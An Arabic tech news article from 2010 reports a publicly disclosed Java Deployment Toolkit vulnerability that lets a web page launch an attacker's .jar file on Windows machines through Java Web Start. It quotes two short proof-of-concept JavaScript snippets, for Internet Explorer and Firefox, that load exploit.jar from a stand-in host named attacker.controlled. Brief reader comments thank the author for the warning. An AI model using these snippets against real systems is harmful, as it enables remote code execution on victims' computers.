| ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز |
| الكاتب عبدالمهيمن الآغا |
| الأحد, 11 أبريل 2010 01:42 |
|
اكتشف أحد مهندسي Google ثغرة خطيرة في JAVA موجودة في جميع الاصدارات التي تم اطلاقها بعد Java 6 Update 10. بحسب مكتشف الثغرة Tavis Ormandy والذي قام بنشر تفاصيلها بشكل علني مستخدمي ويندوز بجميع اصداراته معرضين للاختراق عن طريق المتصفّح بغض النظر عن نوعه طالما جافا منصّبة بالجهاز.
تعتبر هذه الثغرة شديدة الخطورة لأنها تعرض جميع اصدارات نظام ويندوز للاختراق عن طريق المتصفّح بكل سهولة وذلك عن طريق توجيه المستخدم لرابط يحتوي على كود يستغل خطأ في Java Deployment Toolkit التي تم اضافتها الى JAVA 6 Update 10 مما يسمح له بتمرير ملف .jar الى Java Web Start (وهي تقنيّة تسمح للمطورين بتشغيل برامجهم المبرمجة بلغة جافا من الانترنت عن طريق بروتوكول JNLP) وتشغيله على جهاز المستخدم. استغلال هذه الثغرة لا يتعلّق بالمتصفّح حيث يمكن استغلالها على Internet Explorer و Firefox أيضاً في نظام ويندوز. أما أنظمة لينوكس وماك فعلى الأغلب أنها غير مصابة بهذه الثغرة.
كود الاستغلال في متصفّح Internet Explorer سيكون بالشكل: var o = document.createElement("OBJECT");o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"; o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
أما متصفّح Mozilla Firefox فالكود هو نفسه تقريباً: var o = document.createElement("OBJECT");o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit" document.body.appendChild(o); o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
بسبب خطأ في طريقة معالجة الدالة launch للرابط الذي وضعه المهاجم, هذا مكّنه من حقن ملف .jar سيتم تمريره الى javaws التي بدورها ستقوم بتشغيله على النظام. مكتشف الثغرة كتب أنه أبلغ Sun قبل نشرها بشكل علني لكن رد الشركة أتى أن هذه الثغرة ليست خطيرة بما فيه الكفاية ليقوموا بكسر دورة التحديث الخاصة بجافا.
لمزيد من المعلومات: Full Disclosure mailing list
إضافة إلى المفضلة
مشاركة
إرسال إلى صديق
المشاهدات: 4462 التعليقات (9)
![]() أرسلت بواسطة: houssein في April 13, 2010
مشكور جدا على التحذير
خاصة و ان الجافا منتشرة بشكل كبير في عالمنا العربي ... أرسلت بواسطة: Shehab Napster في April 26, 2010
تسلم علي الخبر الحصري يا عبد المهيمن
نشكرك كلنا عليه والله يا اخي أضف تعليق
يجب عليك الاشتراك بالموقع لتتمكن من كتابة التعليقات, الاشتراك مجاني ويستغرق بضع ثوان فقط!
اذا كنت مشترك مسبقا في الموقع فضلاً قم بتسجيل الدخول. |









